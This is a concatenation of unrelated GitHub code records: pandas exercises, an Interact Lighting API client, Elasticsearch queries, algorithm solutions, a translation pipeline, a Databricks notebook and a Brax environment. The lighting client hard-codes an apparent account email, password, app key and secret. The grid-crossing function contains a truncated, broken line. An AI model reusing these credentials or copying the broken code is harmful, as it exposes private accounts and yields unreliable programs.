type_each.append(1)\n else:\n type_each.append(0)\n i[\"type\"] = type_each\n master.append(type_each)\n type_each = []\n\n penalty_20 = []\n penalty_50 = []\n\n df = pd.DataFrame(master)\n for i in df.columns:\n a = df[i].tolist().count(1)\n b = df[i].tolist().count(2)\n\n penalty_20.append(a)\n penalty_50.append(b)\n\n new_df = {'Penalty_20': penalty_20,\n 'Penalty_50': penalty_50}\n\n return pd.DataFrame(new_df)\n\n\n\n\ndef compute_stats(fh1, fh2, fh3):\n \"\"\"\n >>> fh1, fh2, fh3 = open('linkedin1.csv'), open('linkedin2.csv'), open('linkedin3.csv')\n >>> out = compute_stats(fh1, fh2, fh3)\n >>> set(map(lambda x:isinstance(x, str), out)) == {True}\n True\n >>> len(out) # first name, job, slogan, animal\n 4\n \"\"\"\n\n a = pd.read_csv(fh1)\n b = pd.read_csv(fh2)\n c = pd.read_csv(fh3)\n a = a.drop('Unnamed: 0', axis=1)\n b = b.rename(columns={'first_name': 'firstname'})\n b = b.rename(columns={'favorite_animal': 'favoriteanimal'})\n c = c.rename(columns={'COMPANY': 'company'})\n c = c.rename(columns={'OTHER': 'other'})\n c = c.rename(columns={'JOB': 'job'})\n c = c.rename(columns={'FIRSTNAME': 'firstname'})\n c = c.rename(columns={'SLOGAN': 'slogan'})\n c = c.rename(columns={'FAVORITEANIMAL': 'favoriteanimal'})\n\n combined = pd.merge(a, b, how='outer')\n new_combined = pd.merge(combined, c, how='outer')\n\n name = new_combined.groupby(['firstname']).size().idxmax()\n job = new_combined.groupby(['job']).size().idxmax()\n slogan = new_combined.groupby(['slogan']).size().idxmax()\n favorite = new_combined.groupby(['favoriteanimal']).size().idxmax()\n\n return [name, job, slogan, favorite]\n\n\n\ndef job_word_distribution(jobtitles):\n \"\"\"\n >>> salaries = pd.read_csv('san-diego-2017.csv')\n >>> jobtitle = salaries['Job Title']\n >>> out = job_word_distribution(jobtitle)\n >>> 'Police' in out.index\n True\n >>> set(map(lambda x:x.count(' ') == 0, out.index)) == {True}\n True\n >>> (len(out) >= 500) and (len(out) <= 550) # number of distinct words\n True\n \"\"\"\n\n jobtitles = jobtitles.str.cat(sep=' ')\n a = jobtitles.split()\n\n return pd.Series(a).value_counts()\n\n\n\ndef describe_salaries_by_job_type(salaries):\n \"\"\"\n >>> salaries = pd.read_csv('san-diego-2017.csv')\n >>> out = describe_salaries_by_job_type(salaries)\n >>> (out.columns == ['count', 'mean', 'std', 'min', '25%', '50%', '75%', 'max']).all()\n True\n \"\"\"\n job_types = ['Police', 'Fire', 'Libr', 'Rec', 'Grounds', 'Lifeguard', 'Water', 'Equip', 'Utility', 'Clerical',\n 'Administrative', 'Sanitation', 'Principal', 'Public', 'Dispatcher']\n lst = []\n for i in range(salaries['Job Title'].count()):\n # for j in salaries['Job Title'][i].split():\n for j in job_types:\n if j in salaries['Job Title'][i]:\n lst.append(j)\n else:\n lst.append('other')\n # if j in job_types:\n # a = salaries['Total Pay'].describe\n # salaries['new'] = lst\n salaries['new'] = pd.Series(lst)\n common = salaries.groupby('new')\n return common['Total Pay'].describe()\n\n\n\ndef std_salaries_by_job_type(salaries):\n \"\"\"\n >>> salaries = pd.read_csv('san-diego-2017.csv')\n >>> out = std_salaries_by_job_type(salaries)\n >>> set(out.columns) == set(['Base Pay', 'Overtime Pay', 'Total Pay', 'Job Type'])\n True\n >>> np.all(abs(out.select_dtypes(include='number').mean()) < 10**-7) # standard units should average to 0!\n True\n \"\"\"\n\n job_types = ['Police', 'Fire', 'Libr', 'Rec', 'Grounds', 'Lifeguard', 'Water', 'Equip', 'Utility', 'Clerical',\n 'Administrative', 'Sanitation', 'Principal', 'Public', 'Dispatcher']\n lst = []\n for i in 
range(salaries['Job Title'].count()):\n # for j in salaries['Job Title'][i].split():\n for j in job_types:\n if j in salaries['Job Title'][i]:\n lst.append(j)\n else:\n lst.append('other')\n # if j in job_types:\n # a = salaries['Total Pay'].describe\n # salaries['new'] = lst\n salaries['new'] = pd.Series(lst)\n common = salaries.groupby('new')\n x = common.transform(lambda x: (x - x.mean()) / x.std())\n df = {'Job Type': salaries['new'],\n 'Base Pay': x['Base Pay'],\n 'Overtime Pay': x['Overtime Pay'],\n 'Total Pay': x['Total Pay']}\n\n return pd.DataFrame(df)\n\n\ndef bucket_total_pay(totpay):\n \"\"\"\n >>> salaries = pd.read_csv('san-diego-2017.csv')\n >>> out = bucket_total_pay(salaries['Total Pay'])\n >>> set(np.unique(out)) == set(range(1,11))\n True\n >>> np.all(np.abs(np.histogram(out)[0] - out.size/10) < 1) # equal bin sizes!\n True\n \"\"\"\n bins = (np.percentile(totpay, np.arange(10, 101, 10))).astype(int)\n lst = []\n for i in range(totpay.count()):\n if totpay[i] <= bins[0]:\n lst.append(1)\n if totpay[i] <= bins[1] and totpay[i] > bins[0]:\n lst.append(2)\n if totpay[i] <= bins[2] and totpay[i] > bins[1]:\n lst.append(3)\n if totpay[i] <= bins[3] and totpay[i] > bins[2]:\n lst.append(4)\n if totpay[i] <= bins[4] and totpay[i] > bins[3]:\n lst.append(5)\n if totpay[i] <= bins[5] and totpay[i] > bins[4]:\n lst.append(6)\n if totpay[i] <= bins[6] and totpay[i] > bins[5]:\n lst.append(7)\n if totpay[i] <= bins[7] and totpay[i] > bins[6]:\n lst.append(8)\n if totpay[i] <= bins[8] and totpay[i] > bins[7]:\n lst.append(9)\n if totpay[i] <= bins[9] and totpay[i] > bins[8]:\n lst.append(10)\n # if totpay[i] >= bins[9]:\n # lst.append(10)\n\n return pd.Series(lst)\n\ndef mean_salary_per_decile(salaries):\n \"\"\"\n >>> salaries = pd.read_csv('san-diego-2017.csv')\n >>> out = mean_salary_per_decile(salaries)\n >>> len(out) == 10\n True\n >>> 50000 <= out[5] <= 60000\n True\n \"\"\"\n\n totpay = salaries['Total Pay']\n bins = (np.percentile(totpay, np.arange(10, 101, 10))).astype(int)\n lst = []\n lst2 = []\n lst3 = []\n lst4 = []\n lst5 = []\n lst6 = []\n lst7 = []\n lst8 = []\n lst9 = []\n lst10 = []\n for i in range(totpay.count()):\n if totpay[i] <= bins[0]:\n lst.append(totpay[i])\n if totpay[i] <= bins[1] and totpay[i] > bins[0]:\n lst2.append(totpay[i])\n if totpay[i] <= bins[2] and totpay[i] > bins[1]:\n lst3.append(totpay[i])\n if totpay[i] <= bins[3] and totpay[i] > bins[2]:\n lst4.append(totpay[i])\n if totpay[i] <= bins[4] and totpay[i] > bins[3]:\n lst5.append(totpay[i])\n if totpay[i] <= bins[5] and totpay[i] > bins[4]:\n lst6.append(totpay[i])\n if totpay[i] <= bins[6] and totpay[i] > bins[5]:\n lst7.append(totpay[i])\n if totpay[i] <= bins[7] and totpay[i] > bins[6]:\n lst8.append(totpay[i])\n if totpay[i] <= bins[8] and totpay[i] > bins[7]:\n lst9.append(totpay[i])\n if totpay[i] <= bins[9] and totpay[i] > bins[8]:\n lst10.append(totpay[i])\n\n return pd.Series([np.mean(lst), np.mean(lst2), np.mean(lst3), np.mean(lst4), np.mean(lst5), np.mean(lst6),\n np.mean(lst7), np.mean(lst8), np.mean(lst9), np.mean(lst10)],\n index=[1, 2, 3, 4, 5, 6, 7, 8, 9, 10])\n\n\n\ndef robo_table(phones):\n \"\"\"\n >>> phones = pd.read_csv('phones.csv')\n >>> out = robo_table(phones)\n >>> set(out.columns) == set(['id', 'first_name', 'last_name', 'phone'])\n True\n >>> _ = out.phone.dropna().astype(int)\n \"\"\"\n df = phones\n\n phone = df['cell_phone'].fillna(df['home_phone'])\n phone = phone.fillna(df['work_phone'])\n phone = phone.apply(str)\n\n a = phone.notnull()\n for i in 
range(phone.count()):\n if a[i]:\n filter(lambda x: x.isdigit(), phone[i])\n phone[i] = str(phone[i])\n phone[i] = phone[i].replace('.0', '')\n\n newdf = {'id': df.id,\n 'first_name': df.first_name,\n 'last_name': df.last_name,\n 'phone': phone}\n\n return pd.DataFrame(newdf)\n\n\nimport re\ndef read_names(dirname):\n \"\"\"\n >>> out = read_names('names')\n >>> set(out.columns) == set(['first_name', 'sex', 'number', 'year'])\n True\n >>> out.year.nunique()\n 138\n \"\"\"\n\n file = os.listdir(dirname)\n # print(file)\n lst = []\n for i in file:\n f = dirname + \"/\" + i\n columns = ['first_name', 'sex', 'number']\n df = pd.read_csv(f, names=columns, header=None)\n year = re.search('yob(.*).txt', i).group(1)\n # year = re.search('yob(.*).txt', i)\n df['year'] = year\n lst.append(df)\n\n frame = pd.concat(lst, axis=0, ignore_index=True)\n\n return frame\n\n\n\n","repo_name":"Hetsvi/basics-data-science","sub_path":"Data combining.py","file_name":"Data combining.py","file_ext":"py","file_size_in_byte":10634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37173146953","text":"# -*- coding: utf-8 -*-\nimport time\nimport json\nimport requests\nimport socket\nfrom struct import pack\n\nimport telnetlib\n\n\nclass API:\n def __init__(self, **kwargs):\n # Initialized common attributes\n self.variables = kwargs\n self.debug = True\n self.set_variable('offline_count', 0)\n self.set_variable('connection_renew_interval', 6000)\n\n def renewConnection(self):\n pass\n\n def set_variable(self, k, v): # k=key, v=value\n self.variables[k] = v\n\n def get_variable(self, k):\n return self.variables.get(k, None) # default of get_variable is none\n\n '''\n Attributes:\n ------------------------------------------------------------------------------------------\n label GET label in string\n status GET status\n unitTime GET time\n type GET type \n ------------------------------------------------------------------------------------------\n '''\n\n '''\n API3 available methods:\n 1. getDeviceStatus() GET\n 2. setDeviceStatus() SET\n '''\n\n # ----------------------------------------------------------------------\n # setDeviceStatus(postmsg), isPostmsgValid(postmsg), convertPostMsg(postmsg)\n def setDeviceStatus(self, postmsg, access_token):\n setDeviceStatusResult = True\n\n if self.isPostMsgValid(postmsg) == True: # check if the data is valid\n\n # _data = json.dumps(self.convertPostMsg(postmsg))\n # _data = _data.encode(encoding='utf_8')\n _data = self.convertPostMsg(postmsg)\n print(\"DATA status = {}\".format(_data))\n\n # get access token\n if access_token is None:\n access_token = self.get_token()\n\n # send data\n try:\n url = \"https://api.interact-lighting.com/interact/api/v1/officeCloud/lightingSpaces/\" + self.get_variable('uuid') + \"/lightState\"\n header = {\"Content-Type\": \"application/json\",\n \"Authorization\": \"Bearer \" + access_token}\n\n response = requests.put(url, data=json.dumps(_data), headers=header)\n print(\"Status Code = {}\".format(response.content))\n self.set_variable('status', _data)\n\n except Exception as err:\n print(\"ERROR: {}\".format(err))\n print(\"ERROR: classAPI_Interact_Lighting connection failure! 
@ setDeviceStatus\")\n setDeviceStatusResult = False\n else:\n print(\"The POST message is invalid, try again\\n\")\n\n return setDeviceStatusResult\n\n def isPostMsgValid(self, postmsg): # check validity of postmsg\n dataValidity = True\n # TODO algo to check whether postmsg is valid\n return dataValidity\n\n def convertPostMsg(self, postmsg):\n msgToDevice = {}\n\n for k, v in postmsg.items():\n if str(k) == 'status':\n msgToDevice['state'] = postmsg['status'].upper() # off, on, automatic, dim\n elif str(k) == 'level':\n msgToDevice['level'] = postmsg['level']\n else:\n msgToDevice[k] = v\n\n return msgToDevice\n\n def get_token(self):\n try:\n url = \"https://api.interact-lighting.com/oauth/accesstoken\"\n header = {\"Content-Type\": \"application/x-www-form-urlencoded\"}\n auth = ('phanumat.saa@pea.co.th', 'Pea2534+')\n data = {\"app_key\": \"Bq0kEixitmZx4rfIEalsU4BZItpxcvbQ\",\n \"app_secret\": \"GEBks337G8hXeoOC\",\n \"service\": \"cb\"}\n response = requests.post(url, auth=auth, data=data, headers=header)\n result = json.loads(response.text)\n return result[\"token\"]\n except Exception as err:\n print(err)\n\n # ----------------------------------------------------------------------\n\n\n# This main method will not be executed when this class is used as a module\ndef main():\n\n interact = API(model='Interact', api='API3', agent_id='25INTF73D39F6', types='lighting',\n uuid='32302d84-6872-4341-99bf-cd1f55255572')\n\n interact.setDeviceStatus({\"status\": \"on\"})\n # interact.setDeviceStatus({\"status\": \"off\"})\n # interact.setDeviceStatus({\"status\": \"automatic\"})\n # interact.setDeviceStatus({\"status\": \"dim\", \"level\": 10})\n # time.sleep(3)\n\n\nif __name__ == \"__main__\": main()\n","repo_name":"Soulweed/Agent","sub_path":"InteractLightingAgent/interactlightingagent/extension/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":4445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"74350123450","text":"\"\"\"\nSearch API Documentation at https://elasticsearch-dsl.readthedocs.io/en/latest/search_dsl.html\n\"\"\"\n\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch_dsl import Search, Q\n\nclient = Elasticsearch()\n\n\n# Match all documents\ndef match_all():\n s = Search(using=client, index=\"sample_film_index\")\n s = s.query('match_all')\n response = s.execute()\n print(\"Num hits:\", len(response.to_dict()['hits']['hits'])) # default 10 limit\n\n\n# Search in title\ndef free_search_in_title(word):\n s = Search(using=client, index=\"sample_film_index\")\n # Q is a shortcut for constructing a query object\n q = Q('match', title=word)\n # At some point, q has to be added to the search object.\n s = s.query(q)\n s = s.highlight_options(pre_tags='', post_tags='') # for html\n s = s.highlight('title', word, fragment_size=999999999, number_of_fragments=1)\n response = s.execute()\n print(\"Num hits for\", word, len(response.to_dict()['hits']['hits']))\n for hit in response:\n print(hit.meta.score) # doc score\n print(hit.meta.highlight) # highlighted snippet\n\n\n# Match exact phrase in text\ndef match_phrase_in_text(phrase):\n s = Search(using=client, index=\"sample_film_index\")\n q = Q('match_phrase', text=phrase)\n s = s.query(q)\n s = s.highlight_options(pre_tags='', post_tags='') # for html\n s = s.highlight('text', fragment_size=999999999, number_of_fragments=1)\n response = s.execute()\n print(\"Num hits for\", phrase, len(response.to_dict()['hits']['hits']))\n for hit in response:\n 
print(hit.meta.score) # doc score\n print(hit.meta.highlight) # highlighted snippet\n\n\ndef test_analyzer(text, analyzer):\n \"\"\"\n you might want to test your analyzer after you define it\n :param text: a string\n :param analyzer: the analyzer you defined\n :return: list of tokens processed by analyzer\n \"\"\"\n output = analyzer.simulate(text)\n return [t.token for t in output.tokens]\n\n\nmatch_all()\nfree_search_in_title('cats')\n# Compare to:\nfree_search_in_title('Cats') # the 'simple' analyzer does lowercasing\nfree_search_in_title('cat') # but not stemming\nmatch_phrase_in_text('she knows')\n","repo_name":"chauncyf/132-Elastic_Search","sub_path":"sample_queries.py","file_name":"sample_queries.py","file_ext":"py","file_size_in_byte":2197,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"4341220890","text":"# https://leetcode.com/problems/missing-number/\n# Given an array nums containing n distinct numbers in the range [0, n], return the only number in the range that is missing from the array.\n\n# Follow up: Could you implement a solution using only O(1) extra space complexity and O(n) runtime complexity?\n\n# Example 1:\n\n# Input: nums = [3,0,1]\n# Output: 2\n# Explanation: n = 3 since there are 3 numbers, so all numbers are in the range [0,3]. 2 is the missing number in the range since it does not appear in nums.\n# Example 2:\n\n# Input: nums = [0,1]\n# Output: 2\n# Explanation: n = 2 since there are 2 numbers, so all numbers are in the range [0,2]. 2 is the missing number in the range since it does not appear in nums.\n# Example 3:\n\n# Input: nums = [9,6,4,2,3,5,7,0,1]\n# Output: 8\n# Explanation: n = 9 since there are 9 numbers, so all numbers are in the range [0,9]. 8 is the missing number in the range since it does not appear in nums.\n# Example 4:\n\n# Input: nums = [0]\n# Output: 1\n# Explanation: n = 1 since there is 1 number, so all numbers are in the range [0,1]. 1 is the missing number in the range since it does not appear in nums.\n\n\n# Constraints:\n\n# n == nums.length\n# 1 <= n <= 104\n# 0 <= nums[i] <= n\n# All the numbers of nums are unique.\nclass Solution(object):\n def missingNumber(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n nums.sort()\n # plus 1 is to add the missing number, minus 1 is to take out 0\n n = len(nums) + 1 - 1\n\n # using Guass's formula for sum of a consecutive range:\n total_if_not_missing = n*(n+1)/2\n actual_total = sum(nums)\n\n missing_num = total_if_not_missing - actual_total\n return missing_num\n\n\ns = Solution()\nnums1 = [9, 6, 4, 2, 3, 5, 7, 0, 1]\nprint(s.missingNumber(nums1))\n","repo_name":"trinhgliedt/Algo_Practice","sub_path":"2021_06_10_missing_number.py","file_name":"2021_06_10_missing_number.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37944574519","text":"'''\r\nImplemente uma função que calcula o menor custo de atravessar uma região de\r\nNorte para Sul. O mapa da região é rectangular, dado por uma lista de strings,\r\nonde cada digito representa a altura de cada ponto. Só é possível efectuar \r\nmovimentos na horizontal ou na vertical, e só é possível passar de um ponto\r\npara outro se a diferença de alturas for inferior ou igual a 2, sendo o custo \r\ndesse movimento 1 mais a diferença de alturas. 
O ponto de partida (na linha\r\nmais a Norte) e o ponto de chegada (na linha mais a Sul) não estão fixados à\r\npartida, devendo a função devolver a coordenada horizontal do melhor\r\nponto para iniciar a travessia e o respectivo custo. No caso de haver dois pontos\r\ncom igual custo, deve devolver a coordenada mais a Oeste.\r\n'''\r\n\r\nmapa1 = [\"4563\",\r\n \"9254\",\r\n \"7234\",\r\n \"3231\",\r\n \"3881\"]\r\n\r\nmapa2 = [\"90999\",\r\n \"00000\",\r\n \"92909\",\r\n \"94909\"]\r\n\r\nmapa3 = [\"000\",\r\n \"888\",\r\n \"111\"]\r\n\r\n\r\ndef travessia(mapa):\r\n final=[]\r\n moves = [(1, 0), (0, 1), (-1, 0), (0, -1)]\r\n\r\n #Fazer a travessia em cada ponto da primeira linha\r\n for i in range(len(mapa[0])):\r\n adj = {}\r\n pai = {}\r\n dist = {}\r\n o = (i, 0)\r\n dist[o] = 0\r\n orla = {o}\r\n while orla:\r\n v = min(orla, key=lambda x: dist[x])\r\n orla.remove(v)\r\n if v not in adj:\r\n adj[v] = {}\r\n\r\n # Criar as edges\r\n for m in moves:\r\n new_X = v[0]+m[0]\r\n new_Y = v[1]+m[1]\r\n new_coord = (new_X, new_Y)\r\n if (new_X >= 0 and new_X < len(mapa[0]) and new_Y >= 0 and new_Y < len(mapa)):\r\n altura = abs(int(mapa[v[1]][v[0]])-int(mapa[new_Y][new_X]))\r\n if new_X0:\r\n final.append(sorted(aux, key=lambda i:(i[3],i[1])).pop(0))\r\n\r\n #Criar a variavel final\r\n final=sorted(final, key=lambda i:(i[3],i[1])).pop(0)\r\n return (final[0],final[3])\r\n\r\n# self.assertEqual(travessia(mapa1),(2,10))\r\n# self.assertEqual(travessia(mapa2),(1,5))\r\n","repo_name":"rubensilva091/Python","sub_path":"LA2/Treino 2/travessia.py","file_name":"travessia.py","file_ext":"py","file_size_in_byte":2818,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42120880154","text":"from transformers import M2M100ForConditionalGeneration, M2M100Tokenizer\nfrom typing import List, Tuple\nfrom split_sentences import SplitSentence\n\n\nclass TranslationPipeline:\n def __init__(self) -> None:\n self.model = M2M100ForConditionalGeneration.from_pretrained(\n \"transZ/M2M_Vi_Ba\")\n self.tokenizer = M2M100Tokenizer.from_pretrained(\"transZ/M2M_Vi_Ba\")\n self.tokenizer.src_lang = \"vi\"\n\n def translate(self, sent: str) -> str:\n vi_text = sent\n encoded_vi = self.tokenizer(vi_text, return_tensors=\"pt\")\n generated_tokens = self.model.generate(\n **encoded_vi, forced_bos_token_id=self.tokenizer.get_lang_id(\"ba\"))\n ba_text = self.tokenizer.batch_decode(\n generated_tokens, skip_special_tokens=True)[0]\n return ba_text\n\n async def __call__(self, text: str) -> Tuple[List[str], List[str]]:\n vi_paragraphs = text.split('\\n')\n ba_paragraphs = []\n for paragraph in vi_paragraphs:\n sents = SplitSentence(paragraph)\n translated_sentences = [self.translate(\n sent) + \".\" for sent in sents]\n translated_paragraph = \" \".join(translated_sentences)\n ba_paragraphs.append(\n translated_paragraph if paragraph != '' else '')\n return vi_paragraphs, ba_paragraphs\n","repo_name":"TokisakiKurumi2001/M2M_fastAPI","sub_path":"pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"42284687709","text":"import configparser\nimport glob\nimport os\nimport shutil\nimport struct\nimport time\nimport pickle\n\ndef timed_folder_name():\n name = time.asctime()\n for x in range(3): name = name.replace(' ', ' ')\n name = name.replace(' ', '_')\n name = name.replace(':', '_')\n return name\n\n\ndef copy_files(target, 
extension='.py'):\n files = glob.glob('*' + extension)\n for f in files:\n # print(f, '>'),\n src = os.path.join(os.getcwd(), f)\n tgt = target + '/' + f\n # print src, '>', tgt\n shutil.copy(src, tgt)\n\n\ndef copy_folder(src, target):\n try:\n shutil.rmtree(target)\n except shutil.Error as e:\n print(('Directory not copied. Error: %s' % e))\n try:\n shutil.copytree(src, target)\n except shutil.Error as e:\n print(('Directory not copied. Error: %s' % e))\n except OSError as e:\n print(('Directory not copied. Error: %s' % e))\n\n\ndef copy_library(target, src='library'):\n try:\n shutil.copytree(src, target)\n # Directories are the same\n except shutil.Error as e:\n print(('Directory not copied. Error: %s' % e))\n # Any error saying that the directory doesn't exist\n except OSError as e:\n print(('Directory not copied. Error: %s' % e))\n\n\ndef find_nearest(array, value):\n array = numpy.asarray(array)\n idx = (numpy.abs(array - value)).argmin()\n return array[idx]\n\n\ndef mat2array(matrix):\n array = numpy.array(matrix, dtype='f')\n array = numpy.squeeze(array)\n if array.shape == (): array = numpy.reshape(array, (1,))\n return array\n\n\ndef normalize_vector(vector):\n norm = numpy.linalg.norm(vector)\n if norm == 0: return vector\n x = vector / norm\n return x\n\n\ndef angle_between(v1, v2):\n v1 = numpy.reshape(v1, (1, -1))\n v2 = numpy.reshape(v2, (-1, 1))\n v1_u = normalize_vector(v1)\n v2_u = normalize_vector(v2)\n angle = numpy.arccos(numpy.clip(numpy.dot(v1_u, v2_u), -1.0, 1.0))\n angle = float(angle)\n angle = numpy.rad2deg(angle)\n if numpy.isnan(angle): return 90\n return angle\n\n\ndef signed_vector_angle(p1, p2):\n ang1 = numpy.arctan2(*p1[::-1])\n ang2 = numpy.arctan2(*p2[::-1])\n return numpy.rad2deg((ang1 - ang2) % (2 * numpy.pi))\n\n\ndef append2csv(data, path, sep=\",\"):\n import os\n if not os.path.isfile(path):\n data.to_csv(path, mode='a', index=False, sep=sep)\n else:\n data.to_csv(path, mode='a', index=False, sep=sep, header=False)\n\n\ndef scale_ranges(a, b, zoom_out=1.25):\n rng_a = numpy.ptp(a)\n rng_b = numpy.ptp(b)\n mean_a = numpy.mean(a)\n mean_b = numpy.mean(b)\n if rng_b > rng_a: a = (b - mean_b) + mean_a\n if rng_a > rng_b: b = (a - mean_a) + mean_b\n mean_a = numpy.mean(a)\n mean_b = numpy.mean(b)\n a = ((a - mean_a) * zoom_out) + mean_a\n b = ((b - mean_b) * zoom_out) + mean_b\n return a, b\n\n\ndef minmax(array):\n mn = numpy.nanmin(array)\n mx = numpy.nanmax(array)\n rng = numpy.array((mn, mx), dtype='f')\n return rng\n\n\ndef unwrap(angles):\n radians = numpy.deg2rad(angles)\n radians = numpy.unwrap(radians)\n angels = numpy.rad2deg(radians)\n return angels\n\n\ndef iterable(x):\n if isinstance(x, str): return False\n try:\n for t in x:\n break\n return True\n except:\n return False\n\n\ndef isstr(x):\n return isinstance(x, str)\n\n\ndef nan_array(shape):\n return numpy.full(shape, numpy.nan)\n\n\ndef rand_range(min_value, max_value, shape):\n y = numpy.random.random(shape)\n y = y * (max_value - min_value)\n y = y + min_value\n return y\n\n\ndef unit_vector(norm=1):\n return numpy.array([[0], [0], [1]], dtype='f') * norm\n\n\ndef closest(array, value):\n idx = (numpy.abs(array - value)).argmin()\n return array[idx], idx\n\n\ndef angle_arrays(az_range=180, el_range=90, step=2.5, grid=True):\n az_range = abs(az_range)\n el_range = abs(el_range)\n az = numpy.arange(-az_range, az_range + 0.001, step)\n az = numpy.transpose(az)\n el = numpy.arange(-el_range, el_range + 0.001, step)\n if not grid: return az, el\n az, el = numpy.meshgrid(az, el)\n return 
az, el\n\n\ndef random_cds(n, min_value, max_value, y_zero=True):\n points = numpy.random.rand(n, 3)\n r = max_value - min_value\n points = (points * r) + min_value\n x = points[:, 0]\n y = points[:, 1]\n z = points[:, 2]\n if y_zero: y = numpy.zeros(x.shape)\n return x, y, z\n\n\ndef corr2cov(sigma, corr):\n sigma = numpy.array(sigma, dtype='f')\n corr = numpy.array(corr, dtype='f')\n cov = corr * (numpy.transpose(sigma) * sigma)\n return cov\n\n\ndef almost_equal(a, b, threshold):\n diff = abs(a - b)\n if diff <= threshold: return True\n return False\n\n\ndef sign(x):\n if x < 0: return -1\n if x > 0: return 1\n if x == 0: return 0\n\n\ndef lst2command(lst):\n command = ''\n for x in lst: command += str(x) + ','\n command = command.rstrip(',')\n command += '*'\n return command\n\n\ndef lst2str(lst):\n if isinstance(lst, str): return lst\n text = ''\n for x in lst: text += str(x) + ' '\n text = text.rstrip(' ')\n return text\n\n\ndef contains(text, lst):\n for x in lst:\n if x in text: return True\n return False\n\n","repo_name":"dvanderelst/robot_server","sub_path":"library/Misc.py","file_name":"Misc.py","file_ext":"py","file_size_in_byte":5156,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27360581092","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC # Produce Driver Standings\n\n# COMMAND ----------\n\ndbutils.widgets.text(\"p_file_date\", \"2021-03-21\")\nv_file_date = dbutils.widgets.get(\"p_file_date\")\n\n# COMMAND ----------\n\n# MAGIC %run \"../includes/configuration\"\n\n# COMMAND ----------\n\n# race_results_df = spark.read.parquet(f\"{presentation_folder_path}/race_results.parquet\")\n# race_results_df = spark.read.parquet(f\"{presentation_folder_path}/race_results\")\nrace_results_df = spark.read.format(\"delta\").load(f\"{presentation_folder_path}/race_results\").filter(f\"file_date = '{v_file_date}'\")\n\n# COMMAND ----------\n\nrace_results_df.show(5)\n\n# COMMAND ----------\n\nfrom pyspark.sql.window import Window\nfrom pyspark.sql import functions as f\n\n# COMMAND ----------\n\ndriver_standings_df = race_results_df.groupBy(\"race_year\", \"driver_name\", \"driver_nationality\", \"team\") \\\n .agg(f.sum(\"points\").alias(\"total_points\"), f.count(f.when(f.col(\"position\") == 1, True)).alias(\"wins\"))\n\n# COMMAND ----------\n\ndisplay(driver_standings_df.filter(\"race_year = 2020\"))\n\n# COMMAND ----------\n\ndriver_rank_spec = Window.partitionBy(\"race_year\").orderBy(f.desc(\"total_points\"), f.desc(\"wins\"))\n\n# COMMAND ----------\n\nfinal_df = driver_standings_df.withColumn(\"rank\", f.rank().over(driver_rank_spec))\n\n# COMMAND ----------\n\ndisplay(final_df.filter(\"race_year = 2020\"))\n\n# COMMAND ----------\n\n# final_df.write.mode(\"overwrite\").parquet(f\"{presentation_folder_path}/driver_standings.parquet\")\n# final_df.write.mode(\"overwrite\").format(\"parquet\").saveAsTable(\"f1_presentation.driver_standings\")\nmerge_condition = \"tgt.driver_name = src.driver_name AND tgt.race_id = src.race_id\"\nmerge_delta_data(final_df, 'f1_presentation', 'driver_standings', presentation_folder_path, merge_condition, 'race_id')","repo_name":"swarupmishal/Formula1-Racing-Project-using-PySpark-on-Databricks","sub_path":"transformations/2.driver_standings.py","file_name":"2.driver_standings.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1054874791","text":"from brax.envs.halfcheetah 
import Halfcheetah, _SYSTEM_CONFIG\nfrom google.protobuf import text_format\nimport brax\nfrom brax import jumpy as jp\nimport numpy as np\n\nenv_cfgs = {\n \"Normal\":{},\n \"BigFoot\":{\"foot\": 1.25},\n \"SmallFoot\":{\"foot\": 0.75},\n \"BigThig\":{\"thig\": 1.25},\n \"SmallThig\":{\"thig\": 0.75},\n \"BigShin\":{\"shin\": 1.25},\n \"SmallShin\":{\"shin\": 0.75},\n \"BigTorso\":{\"torso\": 1.25},\n \"SmallTorso\":{\"torso\": 0.75},\n \"SmallGravity\":{\"gravity\": 0.75},\n \"BigGravity\":{\"gravity\": 1.25},\n \"SmallFriction\":{\"friction\": 0.75},\n \"BigFriction\":{\"friction\": 1.25},\n \"TinyGravity\":{\"gravity\": 0.5},\n \"HugeGravity\":{\"gravity\": 1.5},\n \"TinyFriction\":{\"friction\": 0.5},\n \"HugeFriction\":{\"friction\": 1.5}\n}\n\nclass CustomHalfcheetah(Halfcheetah):\n \"\"\"Modified Halfcheetah environment (see test_cfgs)\"\"\"\n def __init__(self, env_cfg = \"Normal\", **kwargs):\n config = text_format.Parse(_SYSTEM_CONFIG, brax.Config())\n env_specs = env_cfgs[env_cfg]\n self.obs_mask = jp.concatenate(np.ones((1,23)))\n for spec,coeff in env_specs.items():\n if spec == \"gravity\":\n config.gravity.z *= coeff\n elif spec == \"friction\":\n config.friction *= coeff\n elif spec == \"obs_mask\":\n zeros = int(coeff*23)\n ones = 23-zeros\n np.random.seed(0)\n self.obs_mask = jp.concatenate(np.random.permutation(([0]*zeros)+([1]*ones)).reshape(1,-1))\n else:\n for body in config.bodies:\n if spec in body.name:\n body.mass *= coeff\n body.colliders[0].capsule.radius *= coeff\n self.sys = brax.System(config)\n\n def _get_obs(self, qp: brax.QP, info: brax.Info) -> jp.ndarray:\n \"\"\"Observe halfcheetah body position and velocities.\n obs_mask applied to simulate defective modules\"\"\"\n # some pre-processing to pull joint angles and velocities\n (joint_angle,), (joint_vel,) = self.sys.joints[0].angle_vel(qp)\n\n # qpos:\n # Z of the torso (1,)\n # orientation of the torso as quaternion (4,)\n # joint angles (8,)\n qpos = [qp.pos[0, 